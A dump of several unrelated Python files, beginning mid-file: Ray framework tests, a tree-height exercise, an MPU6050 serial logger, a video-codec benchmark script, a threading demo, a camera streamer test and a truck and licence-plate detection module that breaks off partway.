s.connect((node_manager_address, node_manager_port))
s.send(1000 * b'asdf')
@ray.remote
def f():
return 1
assert ray.get(f.remote()) == 1
def test_non_ascii_comment(ray_start_regular):
@ray.remote
def f():
# 日本語 Japanese comment
return 1
assert ray.get(f.remote()) == 1
@ray.remote
def echo(x):
return x
@ray.remote
class WithConstructor(object):
def __init__(self, data):
self.data = data
def get_data(self):
return self.data
@ray.remote
class WithoutConstructor(object):
def set_data(self, data):
self.data = data
def get_data(self):
return self.data
class BaseClass(object):
def __init__(self, data):
self.data = data
def get_data(self):
return self.data
@ray.remote
class DerivedClass(BaseClass):
def __init__(self, data):
# Due to different behaviors of super in Python 2 and Python 3,
# we use BaseClass directly here.
BaseClass.__init__(self, data)
def test_load_code_from_local(shutdown_only):
ray.init(load_code_from_local=True, num_cpus=4)
message = "foo"
# Test normal function.
assert ray.get(echo.remote(message)) == message
# Test actor class with constructor.
actor = WithConstructor.remote(1)
assert ray.get(actor.get_data.remote()) == 1
# Test actor class without constructor.
actor = WithoutConstructor.remote()
actor.set_data.remote(1)
assert ray.get(actor.get_data.remote()) == 1
# Test derived actor class.
actor = DerivedClass.remote(1)
assert ray.get(actor.get_data.remote()) == 1
# Test using ray.remote decorator on raw classes.
base_actor_class = ray.remote(num_cpus=1)(BaseClass)
base_actor = base_actor_class.remote(message)
assert ray.get(base_actor.get_data.remote()) == message
def test_shutdown_disconnect_global_state():
ray.init(num_cpus=0)
ray.shutdown()
with pytest.raises(Exception) as e:
ray.global_state.object_table()
assert str(e.value).endswith("ray.init has been called.")
@pytest.mark.parametrize(
"ray_start_object_store_memory", [10**8], indirect=True)
def test_redis_lru_with_set(ray_start_object_store_memory):
x = np.zeros(8 * 10**7, dtype=np.uint8)
x_id = ray.put(x)
# Remove the object from the object table to simulate Redis LRU eviction.
removed = False
start_time = time.time()
while time.time() < start_time + 10:
if ray.global_state.redis_clients[0].delete(b"OBJECT" +
x_id.binary()) == 1:
removed = True
break
assert removed
# Now evict the object from the object store.
ray.put(x) # This should not crash.
|
tree-height.py
|
# python3
import sys, threading
sys.setrecursionlimit(10**7) # max depth of recursion
threading.stack_size(2**27) # new thread will get stack of such size
class TreeHeight:
def read(self):
self.n = int(sys.stdin.readline())
self.relationships = list(map(int, sys.stdin.readline().split()))
def build_tree(self):
self.nodes = {}
for child, parent in enumerate(self.relationships):
if parent == -1:
self.root = child
if parent not in self.nodes:
self.nodes[parent] = [child]
else:
self.nodes[parent].append(child)
def compute_height_bfs(self):
q = []
q.append([self.root, 1])
maxHeight = 1
while q:
parent, height = q.pop()
if parent in self.nodes:
height += 1
if height > maxHeight:
maxHeight = height
for child in self.nodes[parent]:
q.append([child, height])
return maxHeight
def main():
tree = TreeHeight()
tree.read()
tree.build_tree()
print(tree.compute_height_bfs())
threading.Thread(target=main).start()
|
readingMPU6050.py
|
import serial
import threading
from time import sleep
from datetime import datetime
from datetime import timedelta
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import numpy as np
#Sensor readings with offsets: -1807 -108 17042 0 4 -3
#Your offsets: -2884 -695 1213 82 -25 2
#Start signal | Packet Type | Packet Length | ... | data | ... | End signal
UART_START_SIGNAL = 0x53
UART_END_SIGNAL = 0x04
dataList = []
timeList = []
sampfreq = 200
tmax = 5
maxSamples = tmax*sampfreq
sampleCounter = 0
flagWait = True
flagAcq = True
flagPause = True
def wait_serial_bytes(how_many):
while porta.inWaiting()<how_many:
if(flagWait == False):
break
pass
def wait_start_signal():
start_signal = 0
while start_signal != UART_START_SIGNAL: #waiting start signal
wait_serial_bytes(1)
start_signal = ord(porta.read())
def inverter(y):
x = bin(y)
return int(x.replace('1','2').replace('0','1').replace('2','0').replace('1b','0b'),2)
def to_signed(num):
return -(inverter(num & 0x7fff))-1 if num & 0x8000 else num & 0x7fff
def to_uint16(MSB,LSB):
return (MSB << 8 | LSB)
def to_int16(MSB,LSB):
return to_signed(MSB << 8 | LSB)
def StartAcq():
porta.write('S'.encode('utf-8'))
def PauseAcq():
porta.write('E'.encode('utf-8'))
def ResumeTh():
global flagWait, flagPause
flagWait = True
flagPause = False
def PauseTh():
global flagWait, flagPause
flagPause = True
flagWait = False
def KillTh():
global flagWait, flagPause, flagAcq
flagWait = False
flagPause = True
flagAcq = False
def Save():
f = open(filename,'w')
for samples in dataList:
for i in range(len(samples)):
f.write(str(samples[i]))
f.write('\t')
f.write('\n')
def worker():
global dataList
while(flagAcq):
if(flagPause == False):
wait_start_signal()
wait_serial_bytes(1)
packet_len = ord(porta.read())
wait_serial_bytes(packet_len)
data = porta.read(packet_len)
cont = 0
dataVector = []
for i in range(packet_len/2):
dataVector.append(to_int16(ord(data[cont]),ord(data[cont+1])))
cont = cont + 2
endByte = ord(porta.read());
if(endByte == UART_END_SIGNAL):
dataVector.append(str(datetime.now()))
dataList.append(dataVector)
print dataVector
return
filename = 'mpu6050data.txt'
portName = '/dev/ttyACM0'
baud = 38400
tout = 1
porta = serial.Serial(portName,baud,timeout=tout)
if(porta.is_open == False):
porta.open()
porta.flushInput()
porta.flushOutput()
threadAcq = threading.Thread(target=worker)
threadAcq.start()
while(1):
print '-------------------------------'
print 'Biomedical Engineering Lab'
print 'MPU 6050 Data Acquisition'
print '-------------------------------'
print 'Menu'
print '1 - New acquisition'
print '2 - Exit'
print '-------------------------------'
strkey = raw_input()
if(strkey == '1'):
StartAcq()
ResumeTh()
print 'Acquisition in process...'
print 'Stop? (y)'
while(1):
strkey = raw_input()
if(strkey == 'y'):
PauseTh()
PauseAcq()
print 'Saving file...'
Save()
del dataList[:]
del timeList[:]
break
elif(strkey == '2'):
KillTh()
porta.close()
break
|
generate_data.py
|
#!/usr/bin/env python3
# Copyright 2016 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import csv
import json
import multiprocessing
import os
import pprint
import re
import shutil
import subprocess
import sys
import tempfile
import threading
import time
import shlex
import math
from encoder_commands import *
import binary_vars
binary_absolute_paths = {}
def find_absolute_path(use_system_path, binary):
global binary_absolute_paths
if binary in binary_absolute_paths:
return binary_absolute_paths[binary]
if use_system_path:
for path in os.environ["PATH"].split(os.pathsep):
target = os.path.join(path.strip('"'), os.path.basename(binary))
if os.path.isfile(target) and os.access(target, os.X_OK):
binary_absolute_paths[binary] = target
return target
target = os.path.join(os.path.dirname(os.path.abspath(__file__)), binary)
if os.path.isfile(target) and os.access(target, os.X_OK):
if use_system_path:
print(
"WARNING: '%s' not in PATH (using --use-system-path), falling back on locally-compiled binary."
% os.path.basename(binary))
binary_absolute_paths[binary] = target
return target
sys.exit(
"ERROR: '%s' missing, did you run the corresponding setup script?" %
(os.path.basename(binary) if use_system_path else target))
yuv_clip_pattern = re.compile(r"^(.*[\._](\d+)_(\d+).yuv):(\d+)$")
def clip_arg(clip):
(file_root, file_ext) = os.path.splitext(clip)
if file_ext == '.y4m':
width = int(
subprocess.check_output(
["mediainfo", "--Inform=Video;%Width%", clip],
encoding='utf-8'))
height = int(
subprocess.check_output(
["mediainfo", "--Inform=Video;%Height%", clip],
encoding='utf-8'))
fps = float(
subprocess.check_output(
["mediainfo", "--Inform=Video;%FrameRate%", clip],
encoding='utf-8'))
return {
'input_file': clip,
'height': height,
'width': width,
'fps': fps,
'file_type': 'y4m'
}
# Make sure YUV files are correctly formatted + look readable before actually
# running the script on them.
clip_match = yuv_clip_pattern.match(clip)
if not clip_match:
raise argparse.ArgumentTypeError(
"Argument '%s' doesn't match input format.\n" % clip)
input_file = clip_match.group(1)
if not os.path.isfile(input_file) or not os.access(input_file, os.R_OK):
raise argparse.ArgumentTypeError(
"'%s' is either not a file or cannot be opened for reading.\n" %
input_file)
return {
'input_file': clip_match.group(1),
'width': int(clip_match.group(2)),
'height': int(clip_match.group(3)),
'fps': float(clip_match.group(4)),
'file_type': 'yuv'
}
def psnr_to_dmos(score):
return 1 - 1 / (1 + math.exp(-0.1657 * (score + -26.19)))
def encoder_pairs(string):
pair_pattern = re.compile(r"^([\w\-]+):(\w+)$")
encoders = []
for pair in string.split(','):
pair_match = pair_pattern.match(pair)
if not pair_match:
raise argparse.ArgumentTypeError(
"Argument '%s' of '%s' doesn't match input format.\n" %
(pair, string))
if not get_encoder_command(pair_match.group(1)):
raise argparse.ArgumentTypeError(
"Unknown encoder: '%s' in pair '%s'\n" %
(pair_match.group(1), pair))
encoders.append((pair_match.group(1), pair_match.group(2)))
return encoders
def writable_dir(directory):
if not os.path.isdir(directory) or not os.access(directory, os.W_OK):
raise argparse.ArgumentTypeError(
"'%s' is either not a directory or cannot be opened for writing.\n"
% directory)
return directory
def positive_int(num):
num_int = int(num)
if num_int <= 0:
raise argparse.ArgumentTypeError("'%d' is not a positive integer.\n" %
num)
return num_int
parser = argparse.ArgumentParser(
description='Generate graph data for video-quality comparison.')
parser.add_argument('--enable-bitrate', action='store_true')
parser.add_argument('clips',
nargs='+',
metavar='clip_WIDTH_HEIGHT.yuv:FPS|clip.y4m',
type=clip_arg)
parser.add_argument('--single-datapoint', action='store_true')
parser.add_argument('--dump-commands', action='store_true')
parser.add_argument('--enable-vmaf', action='store_true')
parser.add_argument('--encoded-file-dir', default=None, type=writable_dir)
parser.add_argument('--encoders',
required=True,
metavar='encoder:codec,encoder:codec...',
type=encoder_pairs)
parser.add_argument('--frame-offset', default=0, type=positive_int)
parser.add_argument('--num-frames', default=-1, type=positive_int)
# TODO(pbos): Add support for multiple spatial layers.
parser.add_argument('--num-spatial-layers', type=int, default=1, choices=[1])
parser.add_argument('--num-temporal-layers',
type=int,
default=1,
choices=[1, 2, 3])
parser.add_argument('--out',
required=True,
metavar='output.txt',
type=argparse.FileType('w'))
parser.add_argument('--use-system-path', action='store_true')
parser.add_argument('--workers', type=int, default=multiprocessing.cpu_count())
def prepare_clips(args, temp_dir):
clips = args.clips
y4m_clips = [clip for clip in clips if clip['file_type'] == 'y4m']
if y4m_clips:
print("Converting %d .y4m clip%s..." %
(len(y4m_clips), "" if len(y4m_clips) == 1 else "s"))
for clip in y4m_clips:
(fd, yuv_file) = tempfile.mkstemp(dir=temp_dir,
suffix=".%d_%d.yuv" %
(clip['width'], clip['height']))
os.close(fd)
with open(os.devnull, 'w') as devnull:
subprocess.check_call(
['ffmpeg', '-y', '-i', clip['input_file'], yuv_file],
stdout=devnull,
stderr=devnull,
encoding='utf-8')
clip['yuv_file'] = yuv_file
for clip in clips:
clip['sha1sum'] = subprocess.check_output(
['sha1sum', clip['input_file']], encoding='utf-8').split(' ', 1)[0]
if 'yuv_file' not in clip:
clip['yuv_file'] = clip['input_file']
frame_size = 6 * clip['width'] * clip['height'] / 4
input_yuv_filesize = os.path.getsize(clip['yuv_file'])
clip['input_total_frames'] = input_yuv_filesize / frame_size
# Truncate file if necessary.
if args.frame_offset > 0 or args.num_frames > 0:
(fd, truncated_filename) = tempfile.mkstemp(dir=temp_dir,
suffix=".yuv")
blocksize = 2048 * 1024
total_filesize = args.num_frames * frame_size
with os.fdopen(fd, 'wb', blocksize) as truncated_file:
with open(clip['yuv_file'], 'rb') as original_file:
original_file.seek(args.frame_offset * frame_size)
while total_filesize > 0:
data = original_file.read(
blocksize
if blocksize < total_filesize else total_filesize)
truncated_file.write(data)
total_filesize -= blocksize
clip['yuv_file'] = truncated_filename
(fd, y4m_file) = tempfile.mkstemp(dir=temp_dir, suffix='.y4m')
os.close(fd)
with open(os.devnull, 'w') as devnull:
subprocess.check_call([
'ffmpeg', '-y', '-s',
'%dx%d' % (clip['width'], clip['height']), '-r',
str(int(clip['fps'] + 0.5)), '-pix_fmt', 'yuv420p', '-i',
clip['yuv_file'], y4m_file
],
stdout=devnull,
stderr=devnull)
clip['y4m_file'] = y4m_file
def decode_file(job, temp_dir, encoded_file):
(fd, decoded_file) = tempfile.mkstemp(dir=temp_dir, suffix=".yuv")
os.close(fd)
(fd, framestats_file) = tempfile.mkstemp(dir=temp_dir, suffix=".csv")
os.close(fd)
with open(os.devnull, 'w') as devnull:
if job['codec'] in ['av1', 'vp8', 'vp9']:
decoder = binary_vars.AOM_DEC_BIN if job[
'codec'] == 'av1' else binary_vars.VPX_DEC_BIN
subprocess.check_call([
decoder, '--i420',
'--codec=%s' % job['codec'], '-o', decoded_file, encoded_file,
'--framestats=%s' % framestats_file
],
stdout=devnull,
stderr=devnull,
encoding='utf-8')
elif job['codec'] == 'h264':
subprocess.check_call(
[binary_vars.H264_DEC_BIN, encoded_file, decoded_file],
stdout=devnull,
stderr=devnull,
encoding='utf-8')
# TODO(pbos): Generate H264 framestats.
framestats_file = None
return (decoded_file, framestats_file)
def add_framestats(results_dict, framestats_file, statstype):
with open(framestats_file) as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
for (metric, value) in row.items():
metric_key = 'frame-%s' % metric
if metric_key not in results_dict:
results_dict[metric_key] = []
results_dict[metric_key].append(statstype(value))
def generate_metrics(results_dict, job, temp_dir, encoded_file):
(decoded_file, decoder_framestats) = decode_file(job, temp_dir,
encoded_file['filename'])
clip = job['clip']
temporal_divide = 2**(job['num_temporal_layers'] - 1 -
encoded_file['temporal-layer'])
temporal_skip = temporal_divide - 1
# TODO(pbos): Perform SSIM on downscaled .yuv files for spatial layers.
(fd, metrics_framestats) = tempfile.mkstemp(dir=temp_dir, suffix=".csv")
os.close(fd)
ssim_results = subprocess.check_output([
binary_vars.TINY_SSIM_BIN, clip['yuv_file'], decoded_file,
"%dx%d" % (results_dict['width'], results_dict['height']),
str(temporal_skip), metrics_framestats
],
encoding='utf-8').splitlines()
metric_map = {
'AvgPSNR': 'avg-psnr',
'AvgPSNR-Y': 'avg-psnr-y',
'AvgPSNR-U': 'avg-psnr-u',
'AvgPSNR-V': 'avg-psnr-v',
'GlbPSNR': 'glb-psnr',
'GlbPSNR-Y': 'glb-psnr-y',
'GlbPSNR-U': 'glb-psnr-u',
'GlbPSNR-V': 'glb-psnr-v',
'SSIM': 'ssim',
'SSIM-Y': 'ssim-y',
'SSIM-U': 'ssim-u',
'SSIM-V': 'ssim-v',
'VpxSSIM': 'vpx-ssim',
}
for line in ssim_results:
if not line:
continue
(metric, value) = line.split(': ')
if metric in metric_map:
results_dict[metric_map[metric]] = float(value)
elif metric == 'Nframes':
layer_frames = int(value)
results_dict['frame-count'] = layer_frames
results_dict['psnr-dmos'] = psnr_to_dmos(results_dict['avg-psnr'])
if decoder_framestats:
add_framestats(results_dict, decoder_framestats, int)
add_framestats(results_dict, metrics_framestats, float)
if args.enable_vmaf:
(fd, results_file) = tempfile.mkstemp(
dir=temp_dir,
suffix="%s-%s-%d.json" %
(job['encoder'], job['codec'], job['qp_value']))
os.close(fd)
vmaf_results = subprocess.check_output([
binary_vars.VMAF_BIN, 'yuv420p',
str(results_dict['width']),
str(results_dict['height']), clip['yuv_file'], decoded_file,
'--out-fmt', 'json'
],
encoding='utf-8')
with open(results_file, 'r') as results_file:
vmaf_obj = json.load(results_file)
results_dict['vmaf'] = float(vmaf_obj['VMAF score'])
results_dict['frame-vmaf'] = []
for frame in vmaf_obj['frames']:
results_dict['frame-vmaf'].append(frame['metrics']['vmaf'])
layer_fps = clip['fps'] / temporal_divide
results_dict['layer-fps'] = layer_fps
spatial_divide = 2**(job['num_spatial_layers'] - 1 -
encoded_file['spatial-layer'])
results_dict['layer-width'] = results_dict['width'] // spatial_divide
results_dict['layer-height'] = results_dict['height'] // spatial_divide
# target_bitrate_bps = job['target_bitrates_kbps'][
# encoded_file['temporal-layer']] * 1000
bitrate_used_bps = os.path.getsize(
encoded_file['filename']) * 8 * layer_fps / layer_frames
# results_dict['target-bitrate-bps'] = target_bitrate_bps
results_dict['actual-bitrate-bps'] = bitrate_used_bps
results_dict['bitrate-utilization'] = float(bitrate_used_bps)
def run_command(job, encoder_command, job_temp_dir, encoded_file_dir):
(command, encoded_files) = encoder_command
clip = job['clip']
start_time = time.time()
try:
process = subprocess.Popen(' '.join(
shlex.quote(arg) if arg != '&&' else arg for arg in command),
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
encoding='utf-8',
shell=True)
except OSError as e:
return (None, "> %s\n%s" % (" ".join(command), e))
(output, _) = process.communicate()
actual_encode_ms = (time.time() - start_time) * 1000
input_yuv_filesize = os.path.getsize(clip['yuv_file'])
input_num_frames = int(input_yuv_filesize /
(6 * clip['width'] * clip['height'] / 4))
target_encode_ms = float(input_num_frames) * 1000 / clip['fps']
if process.returncode != 0:
return (None, "> %s\n%s" % (" ".join(command), output))
results = [{} for i in range(len(encoded_files))]
for i in range(len(results)):
results_dict = results[i]
results_dict['input-file'] = os.path.basename(clip['input_file'])
results_dict['input-file-sha1sum'] = clip['sha1sum']
results_dict['input-total-frames'] = clip['input_total_frames']
results_dict['frame-offset'] = args.frame_offset
# results_dict['param'] = job['param']
# results_dict['bitrate-config-kbps'] = job['target_bitrates_kbps']
results_dict['layer-pattern'] = "%dsl%dtl" % (
job['num_spatial_layers'], job['num_temporal_layers'])
results_dict['encoder'] = job['encoder']
results_dict['codec'] = job['codec']
results_dict['height'] = clip['height']
results_dict['width'] = clip['width']
results_dict['fps'] = clip['fps']
results_dict['actual-encode-time-ms'] = actual_encode_ms
results_dict['target-encode-time-ms'] = target_encode_ms
results_dict[
'encode-time-utilization'] = actual_encode_ms / target_encode_ms
layer = encoded_files[i]
results_dict['temporal-layer'] = layer['temporal-layer']
results_dict['spatial-layer'] = layer['spatial-layer']
generate_metrics(results_dict, job, job_temp_dir, layer)
if encoded_file_dir:
param = job['qp_value'] if job['param'] == 'qp' else job[
'target_bitrates_kbps'][-1]
encoded_file_pattern = "%s-%s-%s-%dsl%dtl-%d-sl%d-tl%d%s" % (
os.path.splitext(os.path.basename(clip['input_file']))[0],
job['encoder'], job['codec'], job['num_spatial_layers'],
job['num_temporal_layers'], param, layer['spatial-layer'],
layer['temporal-layer'], os.path.splitext(layer['filename'])[1])
shutil.move(layer['filename'],
os.path.join(encoded_file_dir, encoded_file_pattern))
else:
os.remove(layer['filename'])
shutil.rmtree(job_temp_dir)
return (results, output)
def find_qp():
if args.single_datapoint:
return [55]
return [35, 40, 45, 48, 53, 55]
def find_bitrates(width, height):
# Do multiples of 100, because grouping based on bitrate splits in
# generate_graphs.py doesn't round properly.
# TODO(pbos): Propagate the bitrate split in the data instead of inferring it
# from the job to avoid rounding errors.
# Significantly lower than exact value, so 800p still counts as 720p for
# instance.
pixel_bound = width * height
if pixel_bound <= 176 * 144:
return [20, 40, 60, 80, 100, 120]
if pixel_bound <= 640 * 360:
return [100, 150, 200, 250, 300, 350]
if pixel_bound <= 854 * 480:
return [125, 250, 375, 500, 625, 750]
if pixel_bound <= 1280 * 720:
return [400, 600, 800, 1000, 1200, 1400]
if pixel_bound <= 1920 * 1080:
return [800, 1200, 1600, 2000, 2400, 2800]
return [1200, 1800, 2400, 3000, 3600, 4200]
layer_bitrates = [[1], [0.6, 1], [0.45, 0.65, 1]]
def split_temporal_bitrates_kbps(target_bitrate_kbps, num_temporal_layers):
bitrates_kbps = []
for i in range(num_temporal_layers):
layer_bitrate_kbps = int(layer_bitrates[num_temporal_layers - 1][i] *
target_bitrate_kbps)
bitrates_kbps.append(layer_bitrate_kbps)
return bitrates_kbps
def generate_jobs(args, temp_dir):
jobs = []
for clip in args.clips:
params = find_bitrates(
clip['width'],
clip['height']) if args.enable_bitrate else find_qp()
for param in params:
for (encoder, codec) in args.encoders:
job = {
'encoder': encoder,
'codec': codec,
'clip': clip,
'num_spatial_layers': args.num_spatial_layers,
'num_temporal_layers': args.num_temporal_layers,
}
if args.enable_bitrate:
job.update({
'param':
'bitrate',
'qp_value':
-1,
'target_bitrates_kbps':
split_temporal_bitrates_kbps(
param, args.num_temporal_layers)
})
else:
job.update({
'param': 'qp',
'qp_value': param,
'target_bitrates_kbps': []
})
job_temp_dir = tempfile.mkdtemp(dir=temp_dir)
(command, encoded_files) = get_encoder_command(job['encoder'])(
job, job_temp_dir)
full_command = find_absolute_path(args.use_system_path,
command[0])
command = [
full_command if word == command[0] else word
for word in command
]
jobs.append((job, (command, encoded_files), job_temp_dir))
return jobs
def start_daemon(func):
t = threading.Thread(target=func)
t.daemon = True
t.start()
return t
def job_to_string(job):
param = ":".join(str(i) for i in job['target_bitrates_kbps']
) if job['param'] == 'bitrate' else job['qp_value']
return "%s:%s %dsl%dtl %s %s" % (
job['encoder'], job['codec'], job['num_spatial_layers'],
job['num_temporal_layers'], param,
os.path.basename(job['clip']['input_file']))
def worker():
global args
global jobs
global current_job
global has_errored
global total_jobs
pp = pprint.PrettyPrinter(indent=2)
while True:
with thread_lock:
if not jobs:
return
(job, command, job_temp_dir) = jobs.pop()
(results, error) = run_command(job, command, job_temp_dir,
args.encoded_file_dir)
job_str = job_to_string(job)
with thread_lock:
current_job += 1
run_ok = results is not None
print(
"[%d/%d] %s (%s)" %
(current_job, total_jobs, job_str, "OK" if run_ok else "ERROR"))
if not run_ok:
has_errored = True
print(error)
else:
for result in results:
args.out.write(pp.pformat(result))
args.out.write(',\n')
args.out.flush()
thread_lock = threading.Lock()
def main():
global args
global jobs
global total_jobs
global current_job
global has_errored
temp_dir = tempfile.mkdtemp()
args = parser.parse_args()
prepare_clips(args, temp_dir)
jobs = generate_jobs(args, temp_dir)
total_jobs = len(jobs)
current_job = 0
has_errored = False
if args.dump_commands:
for (job, (command, encoded_files), job_temp_dir) in jobs:
current_job += 1
print("[%d/%d] %s" % (current_job, total_jobs, job_to_string(job)))
print("> %s" % " ".join(command))
print()
shutil.rmtree(temp_dir)
return 0
# Make sure commands for quality metrics are present.
find_absolute_path(False, binary_vars.TINY_SSIM_BIN)
for (encoder, codec) in args.encoders:
if codec in ['vp8', 'vp9']:
find_absolute_path(False, binary_vars.VPX_DEC_BIN)
elif codec == 'av1':
find_absolute_path(False, binary_vars.AOM_DEC_BIN)
elif codec == 'h264':
find_absolute_path(False, binary_vars.H264_DEC_BIN)
if args.enable_vmaf:
find_absolute_path(False, binary_vars.VMAF_BIN)
print("[0/%d] Running jobs..." % total_jobs)
args.out.write('[')
workers = [start_daemon(worker) for i in range(args.workers)]
[t.join() for t in workers]
args.out.write(']\n')
shutil.rmtree(temp_dir)
return 1 if has_errored else 0
if __name__ == '__main__':
sys.exit(main())
|
thread_condition.py
|
###################################
# File Name : thread_condition.py
###################################
#!/usr/bin/python3
import time
import logging
import threading
logging.basicConfig(level=logging.DEBUG, format="(%(threadName)s) %(message)s")
def receiver(condition):
logging.debug("Start receiver")
with condition:
logging.debug("Waiting...")
condition.wait()
time.sleep(1)
logging.debug("End")
def sender(condition):
logging.debug("Start sender")
with condition:
logging.debug("Send notify")
condition.notifyAll()
logging.debug("End")
def main():
condition = threading.Condition()
for i in range(5):
t = threading.Thread(target=receiver, name="receiver %s" % i, args=(condition,))
t.start()
send = threading.Thread(target=sender, name="sender", args=(condition,))
time.sleep(1)
with condition:
condition.notify(1)
time.sleep(3)
send.start()
if __name__ == "__main__":
main()
|
test_streamer.py
|
# pylint: disable=line-too-long, logging-fstring-interpolation, dangerous-default-value, import-error,redefined-outer-name, unused-argument
import os
import socket
import logging
from datetime import datetime as dt, timedelta
from socket import socket
import threading
import time
from pathlib import Path
from tempfile import mkdtemp
from dateutil.parser import parse
import pytest
from tmv.camera import Camera
from tmv.config import OFF, ON, VIDEO
from tmv.util import LOG_FORMAT, today_at
from freezegun import freeze_time
TEST_DATA = Path(__file__).parent / "testdata"
FDT = None
def sleepless(s):
""" instead of really sleeping, just move frozen time forward """
# pytest or something used 0.01s sleeps during the test: ignore these
# or our times will get stuffed
if s > 0.1:
FDT.tick(timedelta(seconds=s))
# for _ in range(int(s * 10)):
# fdt_global.tick(timedelta(milliseconds=100))
@pytest.fixture(scope="function")
def setup_test():
os.chdir(mkdtemp())
print("Setting cwd to {}".format(os.getcwd()))
logging.basicConfig(format=LOG_FORMAT)
logging.getLogger("tmv.streamer").setLevel(logging.DEBUG)
def test_video(monkeypatch, setup_test):
c = Camera(sw_cam=True)
c.file_by_date = False
with freeze_time(parse("2000-01-01 12:00:00")) as fdt:
global FDT
FDT = fdt
real_sleep = time.sleep
monkeypatch.setattr(time, 'sleep', sleepless)
# start normally
c.mode_button.value = ON
c._interval = timedelta(seconds=60)
while dt.now() < today_at(13):
c.run(1)
fdt.tick(timedelta(seconds=1))
# switch to video mode
c.mode_button.value = VIDEO
vtd = threading.Thread(target=video_server, args=(c, fdt), daemon=True)
vtd.start()
real_sleep(3)
c.mode_button.value = OFF
vtd.join()
real_sleep(1)
# switch to video mode agina : ok
c.mode_button.value = VIDEO
vtd = threading.Thread(target=video_server, args=(c, fdt), daemon=True)
vtd.start()
real_sleep(3)
c.mode_button.value = OFF
vtd.join()
def video_server(c: Camera, fdt):
while c.mode_button.value != VIDEO:
c.run(1)
|
core.py
|
import time
import threading
import logging
from queue import Queue
from threading import Thread, Lock
import cv2
import yaml
import numpy as np
from easydict import EasyDict
from utils.general import non_max_suppression, letterbox
import keras_ocr
from sklearn.cluster import DBSCAN
import onnxruntime
logging.basicConfig(format='[%(asctime)s] %(threadName)s - %(message)s', level=logging.DEBUG)
class Detector:
def __init__(self, cfg='configs/detector_config.yaml'):
self.opt = self._load_config(cfg)
self.imgsz = self.opt.img_size
if isinstance(self.imgsz, int):
self.imgsz = [self.imgsz, self.imgsz]
self.model = onnxruntime.InferenceSession(
self.opt.weights,
providers=['TensorrtExecutionProvider', 'CUDAExecutionProvider', 'CPUExecutionProvider'])
logging.info('Load Detector model')
def _load_config(self, cfg):
with open(cfg) as f:
config = yaml.safe_load(f)
econfig = EasyDict(config)
return econfig.test
def detect(self, bgr_img, threshold = 0.4):
logging.info('Detecting trucks...')
inp = letterbox(bgr_img, new_shape=self.imgsz, stride=64, auto=False)[0]
inp = inp[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB
inp = inp.astype('float32') / 255.0 # 0 - 255 to 0.0 - 1.0
inp = np.expand_dims(inp, 0)
ort_inputs = {self.model.get_inputs()[0].name: inp}
pred = self.model.run(None, ort_inputs)[0]
pred = non_max_suppression(pred, conf_thres=threshold, iou_thres=0.6)
# Process detections
det = pred[0] # detections per image
bboxes = []
scores = []
classes = []
if det is not None and len(det):
# Rescale boxes from img_size to im0 size
_, _, height, width = inp.shape
h, w, _ = bgr_img.shape
det[:, 0] *= w/width
det[:, 1] *= h/height
det[:, 2] *= w/width
det[:, 3] *= h/height
for x1, y1, x2, y2, conf, cls in det: # x1, y1, x2, y2 in pixel format
bboxes.append((x1, y1, x2, y2))
scores.append(conf)
classes.append(cls)
logging.info('Finished detecting')
return bboxes, scores, classes
class LicensePlateDetector(object):
def __init__(self, cfg='configs/lp_detector_config.yaml'):
self.opt = self._load_config(cfg)
self.imgsz = self.opt.img_size
if isinstance(self.imgsz, int):
self.imgsz = [self.imgsz, self.imgsz]
self.model = onnxruntime.InferenceSession(
self.opt.weights,
providers=['TensorrtExecutionProvider', 'CUDAExecutionProvider', 'CPUExecutionProvider'])
logging.info('Loaded License Plate Detector')
def _load_config(self, cfg):
with open(cfg) as f:
config = yaml.safe_load(f)
econfig = EasyDict(config)
return econfig.test
def detect(self, bgr_img, threshold=0.4):
inp = letterbox(bgr_img, new_shape=self.imgsz, stride=64, auto=False)[0]
inp = inp[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB
inp = inp.astype('float32') / 255.0 # 0 - 255 to 0.0 - 1.0
inp = np.expand_dims(inp, 0)
ort_inputs = {self.model.get_inputs()[0].name: inp}
pred = self.model.run(None, ort_inputs)[0]
pred = non_max_suppression(pred, conf_thres=threshold, iou_thres=0.6)
# Process detections
det = pred[0] # detections per image
bboxes = []
scores = []
classes = []
if det is not None and len(det):
# Rescale boxes from img_size to im0 size
_, _, height, width = inp.shape
h, w, _ = bgr_img.shape
det[:, 0] *= w/width
det[:, 1] *= h/height
det[:, 2] *= w/width
det[:, 3] *= h/height
# x1, y1, x2, y2 in pixel format
for x1, y1, x2, y2, conf, cls in det:
bboxes.append((x1, y1, x2, y2))
scores.append(conf)
classes.append(cls)
return bboxes, scores, classes
class LicensePlateRecognizer:
def __init__(self) -> None:
self.rec = keras_ocr.pipeline.Pipeline()
def recognize(self, image):
images = [image]
prediction_groups = self.rec.recognize(images)[0]
texts = []
bboxes = []
if len(prediction_groups):
cluster = DBSCAN()
data = []
xs = []
for text, predictions in prediction_groups:
box = cv2.boundingRect(predictions.reshape(-1, 1, 2))
height = box[3] - box[1]
data.append(height)
texts.append(text)
xs.append(box[0])
bboxes.append(box)
data = np.array(data).reshape(-1, 1)
cluster.fit(data)
labels = cluster.labels_
avg_heights = {}
uniq_labels = np.unique(labels)
for label in uniq_labels:
avg_heights[label] = np.mean(data[data == label])
pos_label = sorted(avg_heights.items(), key=lambda x: x[1])[-1][0]
# Sorted texts by x-axis
indices = np.where(labels == pos_label)[0]
texts = [text[i] for i in indices]
xs = [xs[i] for i in indices]
bboxes = [bboxes[i] for i in indices]
sorted_indices = np.argmax(xs)
texts = [text[i] for i in sorted_indices]
bboxes = [bboxes[i] for i in sorted_indices]
bboxes = np.array(bboxes)
text = ','.join(texts)
bbox = [np.min(bboxes[:, 0]),
np.min(bboxes[:, 1]),
np.max(bboxes[:, 2]),
np.max(bboxes[:, 3])]
return texts, bbox
class StreamInitializationError(Exception):
def __init__(self, *args: object) -> None:
super().__init__(*args)
class Stream:
"""Use threading to capture a frame from camera for faster frame load.
Recommend for camera or webcam.
Args:
